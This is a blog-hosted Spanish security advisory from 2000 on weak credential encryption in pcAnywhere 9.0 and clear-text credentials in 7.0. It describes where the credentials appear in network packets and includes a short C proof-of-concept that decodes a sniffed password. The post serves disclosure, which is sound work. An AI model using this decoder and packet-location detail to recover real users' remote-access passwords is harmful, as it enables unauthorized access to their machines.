Últimos Cambios
Blog personal: El hilo del laberinto
|
|
|
Últimos Cambios |
|
Blog personal: El hilo del laberinto
|
|
|
Última Actualización: 4 de Mayo de 2.000 - Jueves
La última versión de pcAnyware 9.0 cifra los nombres de usuarios y contraseñas de forma trivial, por lo que cualquier atacante con acceso a las redes externas puede capturar esa información y utilizarla para acceder a las máquinas remotas.
pcAnyware es un software para uso y administración remota de máquinas MS Windows, por lo que este problema es especialmente importante, ya que las máquinas remotas suelen encontrarse en redes hostiles.
Se desconoce si la versión 8.0 de pcAnyware es vulnerable también, aunque se considera extremadamente probable. La versión 7.0 envía los nombres de usuario y contraseñas directamente en texto claro, a disposición de cualquier atacante con un sniffer.
El nombre de usuario y la contraseña están contenidas en una cadena dos paquetes después de "Enter your login name" y "enter your password". Están precedidas por el byte 0x06, y el siguiente número es la longitud de la misma.
A continuación se incluye un programa en C que puede utilizarse para descifrar una clave capturada con cualquier sniffer.
>>>>>
#include <stdio.h>
#include <string.h>
void main() {
char password[128];
char cleartext[128];
int i;
// input the sniffed hex values here
// Encrypted example of the 'aaaaa' password
password[0]=0xca;
password[1]=0xab;
password[2]=0xcb;
password[3]=0xa8;
password[4]=0xca;
password[5]='\0';
cleartext[0]=0xca-password[0]+0x61;
for (i=1;i<strlen(password);i++)
cleartext[i] = password[i-1] ^ password[i] ^ i-1;
cleartext[strlen(password)]='\0';
printf("password is %s \n",cleartext);
}
<<<<<
Más información:
Más información sobre los OpenBadges
Donación BitCoin: 19niBN42ac2pqDQFx6GJZxry2JQSFvwAfS
